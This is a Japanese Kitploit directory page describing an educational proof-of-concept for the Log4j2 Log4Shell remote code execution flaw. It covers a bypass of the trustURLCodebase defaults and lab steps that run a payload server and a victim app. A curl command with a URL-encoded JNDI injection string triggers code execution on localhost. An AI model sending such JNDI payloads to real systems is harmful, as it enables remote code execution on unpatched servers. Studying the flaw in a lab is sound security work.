Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j2-rce-poc — Log4j2 JNDI RCE脆弱性(CVE-2021-44228/Log4Shell)の最小限の概念実証 | Kitploit
ツール/GitHubGitHub/unlimitedsola/log4j2-rce-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツール
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

Log4j2 JNDI RCE脆弱性(CVE-2021-44228/Log4Shell)の最小限の概念実証

リポジトリを見る
3244年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j2 RCE脆弱性の概念実証

Log4j2 JNDIリモートコード実行脆弱性(CVE-2021-44228)の最小限の概念実証です。これは教育目的であり、セキュリティ研究者でない人々がその仕組みと影響の大きさを理解するのに役立つことを意図しています。

このPOCは、com.sun.jndi.rmi.object.trustURLCodebaseおよびcom.sun.jndi.cosnaming.object.trustURLCodebaseプロパティをtrueに設定する要件を回避します。これらのプロパティは8u121、7u131、6u141以降デフォルトで無効化されました。

前提条件

  • JDK 1.8

注: payload-serverのコンパイルにはJDK 1.8が必要ですが、victim-appはJDK 15まで脆弱です。なぜならNashornエンジンがJDK 15で削除されたためです。

テスト手順

  1. 次のコマンドを実行してpayload-serverを起動します:
$ ./gradlew runPayloadServer
  1. 新しいターミナルセッションを開き、victim-appを起動します:
$ ./gradlew runVictimApp
  1. curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D を実行してRCEをトリガーします。
  2. リモートコードが実行されたことを確認するには、victim-appのコンソールログを確認してください。意図しないログが画面に出力されているはずです。
ツールをダウンロード